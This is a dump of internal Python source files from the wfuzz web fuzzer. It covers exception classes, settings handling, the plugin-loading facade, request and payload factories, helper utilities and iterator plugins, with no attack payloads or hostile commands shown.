5 | class FuzzExceptBadOptions(FuzzException):
6 | pass
7 |
8 |
9 | class FuzzExceptNoPluginError(FuzzException):
10 | pass
11 |
12 |
13 | class FuzzExceptPluginLoadError(FuzzException):
14 | pass
15 |
16 |
17 | class FuzzExceptIncorrectFilter(FuzzException):
18 | pass
19 |
20 |
21 | class FuzzExceptBadAPI(FuzzException):
22 | pass
23 |
24 |
25 | class FuzzExceptInternalError(FuzzException):
26 | pass
27 |
28 |
29 | class FuzzExceptBadFile(FuzzException):
30 | pass
31 |
32 |
33 | class FuzzExceptBadInstall(FuzzException):
34 | pass
35 |
36 |
37 | class FuzzExceptBadRecipe(FuzzException):
38 | pass
39 |
40 |
41 | class FuzzExceptMissingAPIKey(FuzzException):
42 | pass
43 |
44 |
45 | class FuzzExceptPluginBadParams(FuzzException):
46 | pass
47 |
48 |
49 | class FuzzExceptResourceParseError(FuzzException):
50 | pass
51 |
52 |
53 | class FuzzExceptPluginError(FuzzException):
54 | pass
55 |
56 |
57 | class FuzzExceptNetError(FuzzException):
58 | pass
59 |
--------------------------------------------------------------------------------
/src/wfuzz/externals/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/externals/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/externals/moduleman/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/externals/moduleman/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/externals/moduleman/plugin.py:
--------------------------------------------------------------------------------
1 | try:
2 | from collections.abc import Callable
3 | except ImportError:
4 | from collections import Callable
5 |
6 |
7 | def moduleman_plugin(*args):
8 | method_args = []
9 |
10 | def inner_decorator(cls):
11 | for method in method_args:
12 | if not (method in dir(cls)):
13 | raise Exception("Required method %s not implemented" % method)
14 | cls.__PLUGIN_MODULEMAN_MARK = "Plugin mark"
15 |
16 | return cls
17 |
18 | if not isinstance(args[0], Callable):
19 | method_args += args
20 | return inner_decorator
21 |
22 | return inner_decorator(args[0])
23 |
--------------------------------------------------------------------------------
/src/wfuzz/externals/reqresp/__init__.py:
--------------------------------------------------------------------------------
1 | from .Request import Request
2 | from .Response import Response
3 |
--------------------------------------------------------------------------------
/src/wfuzz/externals/reqresp/cache.py:
--------------------------------------------------------------------------------
1 | from collections import defaultdict
2 |
3 |
4 | class HttpCache:
5 | def __init__(self):
6 | # cache control
7 | self.__cache_map = defaultdict(list)
8 |
9 | def update_cache(self, req, category="default"):
10 | key = req.to_cache_key()
11 |
12 | # first hit
13 | if key not in self.__cache_map:
14 | self.__cache_map[key].append(category)
15 | return True
16 | elif key in self.__cache_map and category not in self.__cache_map[key]:
17 | self.__cache_map[key].append(category)
18 | return True
19 |
20 | return False
21 |
22 | def msg_in_cache(self, req, category="default"):
23 | key = req.to_cache_key()
24 |
25 | return key in self.__cache_map and category in self.__cache_map[key]
26 |
--------------------------------------------------------------------------------
/src/wfuzz/externals/reqresp/exceptions.py:
--------------------------------------------------------------------------------
1 | class ReqRespException(Exception):
2 | FATAL, RESOLVE_PROXY, RESOLVE_HOST, CONNECT_HOST, SSL, TIMEOUT = list(range(6))
3 |
4 | def __init__(self, etype, msg):
5 | self.etype = etype
6 | self.msg = msg
7 | Exception.__init__(self, msg)
8 |
--------------------------------------------------------------------------------
/src/wfuzz/externals/settings/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/externals/settings/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/externals/settings/settings.py:
--------------------------------------------------------------------------------
1 | # Python 2 and 3 (after ``pip install configparser``):
2 | try:
3 | from configparser import ConfigParser
4 | except ImportError:
5 | import ConfigParser
6 | import os
7 | import sys
8 |
9 |
10 | class SettingsBase:
11 | """
12 | Contains application settings. uses a ConfigParser
13 | """
14 |
15 | def __init__(self, save=False):
16 | self.cparser = ConfigParser()
17 |
18 | self.set_all(self.set_defaults())
19 | self.filename = os.path.join(
20 | self._path_to_program_dir(), self.get_config_file()
21 | )
22 | self.cparser.read(self.filename)
23 |
24 | # Base members should implement
25 |
26 | def get_config_file(self):
27 | """Returns the name of the file where the config is saved."""
28 | raise NotImplementedError
29 |
30 | def set_defaults(self):
31 | """
32 | Returns a dictionary with the default settings in the form of
33 | { \
34 | Section: [ \
35 | ("setting_x", '5'),
36 | ...
37 | ("setting_y", '5'),
38 | ],
39 | ...
40 | }
41 | """
42 | raise NotImplementedError
43 |
44 | def has_option(self, section, setting):
45 | return self.cparser.has_option(section, setting)
46 |
47 | def set(self, section, setting, value):
48 | self.cparser.set(section, setting, value)
49 |
50 | def get(self, section, setting):
51 | value = self.cparser.get(section, setting)
52 | return value
53 |
54 | def get_section(self, section):
55 | return self.cparser.items(section)
56 |
57 | def get_options(self, section):
58 | return self.cparser.options(section)
59 |
60 | def get_sections(self):
61 | return self.cparser.sections()
62 |
63 | def get_all(self):
64 | sett = {}
65 |
66 | # dump entire config file
67 | for section in self.cparser.sections():
68 | for option in self.cparser.options(section):
69 | if section not in sett:
70 | sett[section] = []
71 | sett[section].append((option, self.cparser.get(section, option)))
72 |
73 | return sett
74 |
75 | def set_all(self, sett):
76 | self.cparser = ConfigParser()
77 | for section, settings in sett.items():
78 | self.cparser.add_section(section)
79 | for key, value in settings:
80 | self.cparser.set(section, key, value)
81 |
82 | def save(self):
83 | try:
84 | with open(self.filename, "w") as iniFile:
85 | self.cparser.write(iniFile)
86 | except Exception:
87 | return False
88 | return True
89 |
90 | def _path_to_program_dir(self):
91 | """
92 | Returns path to program directory
93 | """
94 | path = sys.argv[0]
95 |
96 | if not os.path.isdir(path):
97 | path = os.path.dirname(path)
98 |
99 | if not path:
100 | return "."
101 |
102 | return path
103 |
--------------------------------------------------------------------------------
/src/wfuzz/facade.py:
--------------------------------------------------------------------------------
1 | from .helpers.file_func import get_home, get_path, get_config_dir
2 | from .helpers.obj_factory import Singleton
3 | from . import __version__ as version
4 | from .externals.moduleman.registrant import MulRegistrant
5 | from .externals.moduleman.loader import DirLoader
6 | from .externals.settings.settings import SettingsBase
7 | from .exception import FuzzExceptNoPluginError, FuzzExceptPluginLoadError
8 |
9 | import os
10 |
11 |
12 | ERROR_CODE = -1
13 | BASELINE_CODE = -2
14 |
15 |
16 | class Settings(SettingsBase):
17 | def get_config_file(self):
18 | config_file = "wfuzz.ini"
19 |
20 | config = os.path.join(get_config_dir(check=False), config_file)
21 | legacy_config = os.path.join(get_home(check=False), config_file)
22 |
23 | if os.path.exists(config):
24 | return config
25 | elif os.path.exists(legacy_config):
26 | return legacy_config
27 | return os.path.join(get_config_dir(check=True), config_file)
28 |
29 | def set_defaults(self):
30 | return dict(
31 | plugins=[("bing_apikey", ""), ("shodan_apikey", "")],
32 | kbase=[
33 | (
34 | "discovery.blacklist",
35 | ".svg-.css-.js-.jpg-.gif-.png-.jpeg-.mov-.avi-.flv-.ico",
36 | )
37 | ],
38 | connection=[
39 | ("concurrent", "10"),
40 | ("conn_delay", "90"),
41 | ("req_delay", "90"),
42 | ("retries", "3"),
43 | ("User-Agent", "Wfuzz/%s" % version),
44 | ],
45 | general=[
46 | ("default_printer", "raw"),
47 | ("cancel_on_plugin_except", "0"),
48 | ("concurrent_plugins", "3"),
49 | ("lookup_dirs", "."),
50 | ("encode_space", "1"),
51 | ],
52 | )
53 |
54 |
55 | class MyRegistrant(MulRegistrant):
56 | def get_plugin(self, identifier):
57 | try:
58 | return MulRegistrant.get_plugin(self, identifier)
59 | except KeyError as e:
60 | raise FuzzExceptNoPluginError(
61 | "Requested plugin %s. Error: %s" % (identifier, str(e))
62 | )
63 |
64 |
65 | class Facade(metaclass=Singleton):
66 | def __init__(self):
67 |
68 | self.__plugins = dict(
69 | printers=None, scripts=None, encoders=None, iterators=None, payloads=None,
70 | )
71 |
72 | self.sett = Settings()
73 |
74 | def _load(self, cat):
75 | try:
76 | if cat not in self.__plugins:
77 | raise FuzzExceptNoPluginError("Non-existent plugin category %s" % cat)
78 |
79 | if not self.__plugins[cat]:
80 | loader_list = []
81 | loader_list.append(
82 | DirLoader(**{"base_dir": cat, "base_path": get_path("../plugins")})
83 | )
84 | loader_list.append(
85 | DirLoader(**{"base_dir": cat, "base_path": get_home()})
86 | )
87 | self.__plugins[cat] = MyRegistrant(loader_list)
88 |
89 | return self.__plugins[cat]
90 | except Exception as e:
91 | raise FuzzExceptPluginLoadError("Error loading plugins: %s" % str(e))
92 |
93 | def proxy(self, which):
94 | return self._load(which)
95 |
96 | def get_registrants(self):
97 | return self.__plugins.keys()
98 |
99 | def __getattr__(self, name):
100 | if name in ["printers", "payloads", "iterators", "encoders", "scripts"]:
101 | return self._load(name)
102 | else:
103 | raise AttributeError
104 |
--------------------------------------------------------------------------------
/src/wfuzz/factories/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/factories/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/factories/fuzzfactory.py:
--------------------------------------------------------------------------------
1 | from ..fuzzrequest import FuzzRequest
2 |
3 | from ..helpers.obj_factory import ObjectFactory, SeedBuilderHelper
4 |
5 |
6 | class FuzzRequestFactory(ObjectFactory):
7 | def __init__(self):
8 | ObjectFactory.__init__(
9 | self,
10 | {
11 | "request_from_options": RequestBuilder(),
12 | "seed_from_options": SeedBuilder(),
13 | },
14 | )
15 |
16 |
17 | class RequestBuilder:
18 | def __call__(self, options):
19 | fr = FuzzRequest()
20 |
21 | fr.url = options["url"]
22 | fr.wf_fuzz_methods = options["method"]
23 | fr.update_from_options(options)
24 |
25 | return fr
26 |
27 |
28 | class SeedBuilder:
29 | def __call__(self, options):
30 | seed = reqfactory.create("request_from_options", options)
31 | marker_dict = SeedBuilderHelper.get_marker_dict(seed)
32 | SeedBuilderHelper.remove_baseline_markers(seed, marker_dict)
33 |
34 | return seed
35 |
36 |
37 | reqfactory = FuzzRequestFactory()
38 |
--------------------------------------------------------------------------------
/src/wfuzz/factories/payman.py:
--------------------------------------------------------------------------------
1 | from ..fuzzobjects import FPayloadManager, FuzzWord, FuzzWordType
2 |
3 | from ..helpers.obj_factory import ObjectFactory, SeedBuilderHelper
4 |
5 |
6 | class PayManFactory(ObjectFactory):
7 | def __init__(self):
8 | ObjectFactory.__init__(
9 | self,
10 | {
11 | "payloadman_from_baseline": BaselinePayloadManBuilder(),
12 | "payloadman_from_request": FuzzReqPayloadManBuilder(),
13 | "empty_payloadman": OnePayloadManBuilder(),
14 | },
15 | )
16 |
17 |
18 | class FuzzReqPayloadManBuilder:
19 | def __call__(self, freq):
20 | fpm = FPayloadManager()
21 |
22 | for pdict in [
23 | pdict
24 | for pdict in SeedBuilderHelper.get_marker_dict(freq)
25 | if pdict["word"] is not None
26 | ]:
27 | fpm.add(pdict)
28 |
29 | return fpm
30 |
31 |
32 | class OnePayloadManBuilder:
33 | def __call__(self, content):
34 | fpm = FPayloadManager()
35 | fpm.add(
36 | {"full_marker": None, "word": None, "index": None, "field": None}, content
37 | )
38 |
39 | return fpm
40 |
41 |
42 | class BaselinePayloadManBuilder:
43 | def __call__(self, freq):
44 | fpm = FPayloadManager()
45 |
46 | for pdict in [
47 | pdict
48 | for pdict in SeedBuilderHelper.get_marker_dict(freq)
49 | if pdict["bl_value"] is not None
50 | ]:
51 | fpm.add(pdict, FuzzWord(pdict["bl_value"], FuzzWordType.WORD), True)
52 |
53 | return fpm
54 |
55 |
56 | payman_factory = PayManFactory()
57 |
--------------------------------------------------------------------------------
/src/wfuzz/factories/plugin_factory.py:
--------------------------------------------------------------------------------
1 | from ..helpers.obj_factory import ObjectFactory
2 |
3 | from ..fuzzobjects import FuzzPlugin, FuzzError
4 | from ..factories.fuzzresfactory import resfactory
5 |
6 |
7 | class PluginFactory(ObjectFactory):
8 | def __init__(self):
9 | ObjectFactory.__init__(
10 | self,
11 | {
12 | "plugin_from_recursion": PluginRecursiveBuilder(),
13 | "plugin_from_error": PluginErrorBuilder(),
14 | "plugin_from_finding": PluginFindingBuilder(),
15 | "plugin_from_summary": PluginFindingSummaryBuilder(),
16 | },
17 | )
18 |
19 |
20 | class PluginRecursiveBuilder:
21 | def __call__(self, name, seed, url):
22 | plugin = FuzzPlugin()
23 | plugin.source = name
24 | plugin._exception = None
25 | plugin._seed = resfactory.create("fuzzres_from_recursion", seed, url)
26 |
27 | return plugin
28 |
29 |
30 | class PluginErrorBuilder:
31 | def __call__(self, name, exception):
32 | plugin = FuzzPlugin()
33 | plugin.source = name
34 | plugin.issue = "Exception within plugin %s: %s" % (name, str(exception))
35 | plugin._exception = FuzzError(exception)
36 | plugin._seed = None
37 |
38 | return plugin
39 |
40 |
41 | class PluginFindingBuilder:
42 | def __call__(self, name, itype, message, data, severity):
43 | plugin = FuzzPlugin()
44 | plugin.source = name
45 | plugin.issue = message
46 | plugin.itype = itype
47 | plugin.data = data
48 | plugin._exception = None
49 | plugin._seed = None
50 | plugin.severity = severity
51 |
52 | return plugin
53 |
54 |
55 | class PluginFindingSummaryBuilder:
56 | def __call__(self, message):
57 | plugin = FuzzPlugin()
58 | plugin.source = FuzzPlugin.OUTPUT_SOURCE
59 | plugin.itype = FuzzPlugin.SUMMARY_ITYPE
60 | plugin.severity = FuzzPlugin.NONE
61 | plugin._exception = None
62 | plugin.data = None
63 | plugin._seed = None
64 | plugin.issue = message
65 |
66 | return plugin
67 |
68 |
69 | plugin_factory = PluginFactory()
70 |
--------------------------------------------------------------------------------
/src/wfuzz/filters/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/filters/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/helpers/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/helpers/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/helpers/obj_dic.py:
--------------------------------------------------------------------------------
1 | from collections.abc import MutableMapping
2 | from itertools import chain
3 |
4 |
5 | class CaseInsensitiveDict(MutableMapping):
6 | def __init__(self, *args, **kwargs):
7 | self.store = dict()
8 | self.proxy = dict()
9 |
10 | self.update(dict(*args, **kwargs)) # use the free update to set keys
11 |
12 | def __contains__(self, k):
13 | return k.lower() in self.proxy
14 |
15 | def __delitem__(self, k):
16 | key = self.proxy[k.lower()]
17 |
18 | del self.store[key]
19 | del self.proxy[k.lower()]
20 |
21 | def __getitem__(self, k):
22 | key = self.proxy[k.lower()]
23 | return self.store[key]
24 |
25 | def get(self, k, default=None):
26 | key = self.proxy[k.lower()]
27 | return self.store[key] if key in self.store else default
28 |
29 | def __setitem__(self, k, v):
30 | self.store[k] = v
31 | self.proxy[k.lower()] = k
32 |
33 | def __iter__(self):
34 | return iter(self.store)
35 |
36 | def __len__(self):
37 | return len(self.store)
38 |
39 |
40 | class DotDict(CaseInsensitiveDict):
41 | def __getattr__(obj, name):
42 | # Return {} if non-existent attr
43 | if name not in obj:
44 | return DotDict({})
45 |
46 | # python 3 val = dict.get(*args, None)
47 | val = obj.get(name)
48 | return DotDict(val) if type(val) is dict else val
49 | # return DotDict(val) if type(val) is dict else DotDict({args[1]: val})
50 |
51 | def __add__(self, other):
52 | if isinstance(other, str):
53 | return DotDict({k: v + other for k, v in self.items() if v})
54 | elif isinstance(other, DotDict):
55 | # python 3 return DotDict({**self, **other})
56 | new_dic = DotDict(self)
57 | new_dic.update(other)
58 | return new_dic
59 |
60 | def __radd__(self, other):
61 | if isinstance(other, str):
62 | return DotDict({k: other + v for k, v in self.items() if v})
63 |
64 | def __getitem__(self, key):
65 | try:
66 | return super(DotDict, self).__getitem__(key)
67 | except KeyError:
68 | return DotDict({})
69 |
70 | def __str__(self):
71 | return "\n".join(
72 | [
73 | "{}{} {}".format(k, "->" if isinstance(v, DotDict) else ":", v)
74 | for k, v in self.items()
75 | ]
76 | )
77 |
--------------------------------------------------------------------------------
/src/wfuzz/helpers/obj_dyn.py:
--------------------------------------------------------------------------------
1 | import functools
2 | from .obj_dic import DotDict
3 |
4 |
5 | allowed_fields = [
6 | "description",
7 | "nres",
8 | "code",
9 | "chars",
10 | "lines",
11 | "words",
12 | "md5",
13 | "l",
14 | "h",
15 | "w",
16 | "c",
17 | "history",
18 | "plugins",
19 | "url",
20 | "content",
21 | "history.url",
22 | "history.method",
23 | "history.scheme",
24 | "history.host",
25 | "history.content",
26 | "history.raw_content" "history.is_path",
27 | "history.pstrip",
28 | "history.cookies",
29 | "history.headers",
30 | "history.params",
31 | "r",
32 | "r.reqtime",
33 | "r.url",
34 | "r.method",
35 | "r.scheme",
36 | "r.host",
37 | "r.content",
38 | "r.raw_content" "r.is_path",
39 | "r.pstrip",
40 | "r.cookies.",
41 | "r.headers.",
42 | "r.params.",
43 | ]
44 |
45 |
46 | def _check_allowed_field(attr):
47 | if [field for field in allowed_fields if attr.startswith(field)]:
48 | return True
49 | return False
50 |
51 |
52 | def _get_alias(attr):
53 | attr_alias = {
54 | "l": "lines",
55 | "h": "chars",
56 | "w": "words",
57 | "c": "code",
58 | "r": "history",
59 | }
60 |
61 | if attr in attr_alias:
62 | return attr_alias[attr]
63 |
64 | return attr
65 |
66 |
67 | def rsetattr(obj, attr, new_val, operation):
68 | # if not _check_allowed_field(attr):
69 | # raise AttributeError("Unknown field {}".format(attr))
70 |
71 | pre, _, post = attr.rpartition(".")
72 |
73 | pre_post = None
74 | if len(attr.split(".")) > 3:
75 | pre_post = post
76 | pre, _, post = pre.rpartition(".")
77 |
78 | post = _get_alias(post)
79 |
80 | try:
81 | obj_to_set = rgetattr(obj, pre) if pre else obj
82 | prev_val = rgetattr(obj, attr)
83 | if pre_post is not None:
84 | prev_val = DotDict({pre_post: prev_val})
85 |
86 | if operation is not None:
87 | val = operation(prev_val, new_val)
88 | else:
89 | if isinstance(prev_val, DotDict):
90 | val = {k: new_val for k, v in prev_val.items()}
91 | else:
92 | val = new_val
93 |
94 | return setattr(obj_to_set, post, val)
95 | except AttributeError:
96 | raise AttributeError(
97 | "rsetattr: Can't set '{}' attribute of {}.".format(
98 | post, obj_to_set.__class__
99 | )
100 | )
101 |
102 |
103 | def rgetattr(obj, attr, *args):
104 | def _getattr(obj, attr):
105 | attr = _get_alias(attr)
106 | try:
107 | return getattr(obj, attr, *args)
108 | except AttributeError:
109 | raise AttributeError(
110 | "rgetattr: Can't get '{}' attribute from '{}'.".format(
111 | attr, obj.__class__
112 | )
113 | )
114 |
115 | # if not _check_allowed_field(attr):
116 | # raise AttributeError("Unknown field {}".format(attr))
117 |
118 | return functools.reduce(_getattr, [obj] + attr.split("."))
119 |
--------------------------------------------------------------------------------
/src/wfuzz/helpers/str_func.py:
--------------------------------------------------------------------------------
1 | import re
2 | import sys
3 | import six
4 |
5 |
6 | from .obj_dic import DotDict
7 |
8 |
9 | def json_minify(string, strip_space=True):
10 | """
11 | Created on 20/01/2011
12 | v0.2 (C) Gerald Storer
13 | MIT License
14 | Based on JSON.minify.js:
15 | https://github.com/getify/JSON.minify
16 | Contributers:
17 | - Pradyun S. Gedam (conditions and variable names changed)
18 | """
19 |
20 | tokenizer = re.compile(r'"|(/\*)|(\*/)|(//)|\n|\r')
21 | end_slashes_re = re.compile(r"(\\)*$")
22 |
23 | in_string = False
24 | in_multi = False
25 | in_single = False
26 |
27 | new_str = []
28 | index = 0
29 |
30 | for match in re.finditer(tokenizer, string):
31 |
32 | if not (in_multi or in_single):
33 | tmp = string[index : match.start()]
34 | if not in_string and strip_space:
35 | # replace white space as defined in standard
36 | tmp = re.sub("[ \t\n\r]+", "", tmp)
37 | new_str.append(tmp)
38 |
39 | index = match.end()
40 | val = match.group()
41 |
42 | if val == '"' and not (in_multi or in_single):
43 | escaped = end_slashes_re.search(string, 0, match.start())
44 |
45 | # start of string or unescaped quote character to end string
46 | if not in_string or (escaped is None or len(escaped.group()) % 2 == 0):
47 | in_string = not in_string
48 | # include " character in next catch
49 | index -= 1
50 | elif not (in_string or in_multi or in_single):
51 | if val == "/*":
52 | in_multi = True
53 | elif val == "//":
54 | in_single = True
55 | elif val == "*/" and in_multi and not (in_string or in_single):
56 | in_multi = False
57 | elif val in "\r\n" and not (in_multi or in_string) and in_single:
58 | in_single = False
59 | elif not ((in_multi or in_single) or (val in " \r\n\t" and strip_space)):
60 | new_str.append(val)
61 |
62 | new_str.append(string[index:])
63 | return "".join(new_str)
64 |
65 |
66 | def python2_3_convert_from_unicode(text):
67 | if sys.version_info >= (3, 0):
68 | return text
69 | else:
70 | return convert_to_unicode(text)
71 |
72 |
73 | def python2_3_convert_to_unicode(text):
74 | if sys.version_info >= (3, 0):
75 | return convert_to_unicode(text)
76 | else:
77 | return text
78 |
79 |
80 | def convert_to_unicode(text):
81 | if isinstance(text, dict) or isinstance(text, DotDict):
82 | return {
83 | convert_to_unicode(key): convert_to_unicode(value)
84 | for key, value in list(text.items())
85 | }
86 | elif isinstance(text, list):
87 | return [convert_to_unicode(element) for element in text]
88 | elif isinstance(text, six.string_types):
89 | return text.encode("utf-8", errors="ignore")
90 | else:
91 | return text
92 |
93 |
94 | def value_in_any_list_item(value, list_obj):
95 | if isinstance(list_obj, list):
96 | return len([item for item in list_obj if value.lower() in item.lower()]) > 0
97 | elif isinstance(list_obj, str):
98 | return value.lower() in list_obj.lower()
99 |
--------------------------------------------------------------------------------
/src/wfuzz/helpers/utils.py:
--------------------------------------------------------------------------------
1 | from threading import Lock
2 | import difflib
3 |
4 |
5 | class MyCounter:
6 | def __init__(self, count=0):
7 | self._count = count
8 | self._mutex = Lock()
9 |
10 | def inc(self):
11 | return self._operation(1)
12 |
13 | def dec(self):
14 | return self._operation(-1)
15 |
16 | def _operation(self, dec):
17 | with self._mutex:
18 | self._count += dec
19 | return self._count
20 |
21 | def __call__(self):
22 | with self._mutex:
23 | return self._count
24 |
25 |
26 | def diff(param1, param2):
27 | delta = difflib.unified_diff(
28 | str(param1).splitlines(False),
29 | str(param2).splitlines(False),
30 | fromfile="prev",
31 | tofile="current",
32 | n=0,
33 | )
34 |
35 | return "\n".join(delta)
36 |
--------------------------------------------------------------------------------
/src/wfuzz/mixins.py:
--------------------------------------------------------------------------------
1 | from .plugin_api.urlutils import parse_url
2 | from .exception import FuzzExceptBadInstall
3 |
4 | # python 2 and 3
5 | import sys
6 |
7 | if sys.version_info >= (3, 0):
8 | from urllib.parse import urljoin, urlparse
9 | else:
10 | from urlparse import urljoin, urlparse
11 |
12 |
13 | class FuzzRequestSoupMixing(object):
14 | def get_soup(self):
15 | try:
16 | from bs4 import BeautifulSoup
17 | except ImportError:
18 | raise FuzzExceptBadInstall("You need to install beautifulsoup4 first!")
19 |
20 | soup = BeautifulSoup(self.content, "html.parser")
21 |
22 | return soup
23 |
24 |
25 | class FuzzRequestUrlMixing(object):
26 | # urlparse functions
27 | @property
28 | def urlparse(self):
29 | return parse_url(self.url)
30 |
31 | @property
32 | def urlp(self):
33 | return parse_url(self.url)
34 |
35 | @property
36 | def pstrip(self):
37 | return self.to_cache_key()
38 |
39 | @property
40 | def is_path(self):
41 | if self.recursive_url and self.recursive_url[-1] == "/":
42 | return True
43 |
44 | return False
45 |
46 | @property
47 | def recursive_url(self):
48 | if self.code >= 300 and self.code < 308 and "Location" in self.headers.response:
49 | location_url = self.headers.response["Location"]
50 | location_parsed_url = urlparse(location_url)
51 |
52 | if not location_parsed_url.scheme and not location_parsed_url.netloc:
53 | return urljoin(self.url, location_url)
54 | elif self.code in [200, 401] and self.url[-1] == "/":
55 | return self.url
56 |
57 | return None
58 |
--------------------------------------------------------------------------------
/src/wfuzz/plugin_api/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugin_api/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/plugin_api/mixins.py:
--------------------------------------------------------------------------------
1 | # Plugins specializations with common methods useful for their own type
2 | from wfuzz.plugin_api.urlutils import parse_url
3 | from .base import BasePlugin
4 |
5 |
6 | class DiscoveryPluginMixin:
7 | def queue_url(self, url):
8 | if not parse_url(url).isbllist:
9 | BasePlugin.queue_url(self, url)
10 | return True
11 | return False
12 |
--------------------------------------------------------------------------------
/src/wfuzz/plugin_api/urlutils.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 |
4 | # Python 2 and 3
5 | import sys
6 |
7 | if sys.version_info >= (3, 0):
8 | from urllib.parse import ParseResult
9 | from urllib.parse import urlparse
10 | from urllib.parse import parse_qs
11 | else:
12 | from urlparse import ParseResult
13 | from urlparse import urlparse
14 | from urlparse import parse_qs
15 |
16 | from wfuzz.facade import Facade
17 | from wfuzz.exception import FuzzExceptBadAPI
18 |
19 |
20 | class FuzzRequestParse(ParseResult):
21 | @property
22 | def ffname(self):
23 | """
24 | Returns script plus extension from an URL. ie. http://www.localhost.com/kk/index.html?id=3
25 | will return index.html
26 | """
27 | u = self.path.split("/")[-1:][0]
28 |
29 | return u
30 |
31 | @property
32 | def fext(self):
33 | """
34 | Returns script extension from an URL. ie. http://www.localhost.com/kk/index.html?id=3
35 | will return .html
36 | """
37 | return os.path.splitext(self.ffname)[1]
38 |
39 | @property
40 | def fname(self):
41 | """
42 | Returns script name from an URL. ie. http://www.localhost.com/kk/index.html?id=3
43 | will return index
44 | """
45 | return os.path.splitext(self.ffname)[0]
46 |
47 | @property
48 | def isbllist(self):
49 | fext = self.fext
50 | return fext != "." and fext in Facade().sett.get(
51 | "kbase", "discovery.blacklist"
52 | ).split("-")
53 |
54 | @property
55 | def hasquery(self):
56 | return self.query != ""
57 |
58 | def cache_key(self, base_urlp=None):
59 | scheme = self.scheme
60 | netloc = self.netloc
61 |
62 | if base_urlp:
63 | scheme = self.scheme if self.scheme else base_urlp.scheme
64 | netloc = self.netloc if self.netloc else base_urlp.netloc
65 |
66 | key = "{}-{}-{}-{}".format(scheme, netloc, self.path, self.params)
67 | dicc = {"g{}".format(key): True for key in parse_qs(self.query).keys()}
68 |
69 | # take URL parameters into consideration
70 | url_params = list(dicc.keys())
71 | url_params.sort()
72 | key += "-" + "-".join(url_params)
73 |
74 | return key
75 |
76 |
77 | def parse_url(url):
78 | # >>> urlparse.urlparse("http://some.page.pl/nothing.py;someparam=some;otherparam=other?query1=val1&query2=val2#frag")
79 | # ParseResult(scheme='http', netloc='some.page.pl', path='/nothing.py', params='someparam=some;otherparam=other', query='query1=val1&query2=val2', fragment='frag')
80 |
81 | scheme, netloc, path, params, query, fragment = urlparse(url)
82 | return FuzzRequestParse(scheme, netloc, path, params, query, fragment)
83 |
84 |
85 | def check_content_type(fuzzresult, which):
86 | ctype = None
87 | if "Content-Type" in fuzzresult.history.headers.response:
88 | ctype = fuzzresult.history.headers.response["Content-Type"]
89 |
90 | if which == "text":
91 | return not ctype or (
92 | ctype and any([ctype.find(x) >= 0 for x in ["text/plain"]])
93 | )
94 | else:
95 | raise FuzzExceptBadAPI("Unknown content type")
96 |
--------------------------------------------------------------------------------
/src/wfuzz/plugins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugins/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/plugins/encoders/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugins/encoders/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/plugins/iterators/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugins/iterators/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/plugins/iterators/iterations.py:
--------------------------------------------------------------------------------
1 | from wfuzz.externals.moduleman.plugin import moduleman_plugin
2 | from wfuzz.dictionaries import BaseIterator
3 |
4 | import itertools
5 | from functools import reduce
6 |
7 | from builtins import zip as builtinzip
8 |
9 |
10 | @moduleman_plugin
11 | class zip(BaseIterator):
12 | name = "zip"
13 | author = ("Xavi Mendez (@xmendez)",)
14 | version = "0.1"
15 | summary = "Returns an iterator that aggregates elements from each of the iterables."
16 | category = ["default"]
17 | priority = 99
18 |
19 | def __init__(self, *i):
20 | self._payload_list = i
21 | self.__width = len(i)
22 | self.__count = min([x.count() for x in i])
23 | self.it = builtinzip(*i)
24 |
25 | def count(self):
26 | return self.__count
27 |
28 | def width(self):
29 | return self.__width
30 |
31 | def payloads(self):
32 | return self._payload_list
33 |
34 | def __next__(self):
35 | return next(self.it)
36 |
37 | def __iter__(self):
38 | return self
39 |
40 |
41 | @moduleman_plugin
42 | class product(BaseIterator):
43 | name = "product"
44 | author = ("Xavi Mendez (@xmendez)",)
45 | version = "0.1"
46 | summary = "Returns an iterator cartesian product of input iterables."
47 | category = ["default"]
48 | priority = 99
49 |
50 | def __init__(self, *i):
51 | self._payload_list = i
52 | self.__width = len(i)
53 | self.__count = reduce(lambda x, y: x * y.count(), i[1:], i[0].count())
54 | self.it = itertools.product(*i)
55 |
56 | def count(self):
57 | return self.__count
58 |
59 | def width(self):
60 | return self.__width
61 |
62 | def payloads(self):
63 | return self._payload_list
64 |
65 | def __next__(self):
66 | return next(self.it)
67 |
68 | def __iter__(self):
69 | return self
70 |
71 |
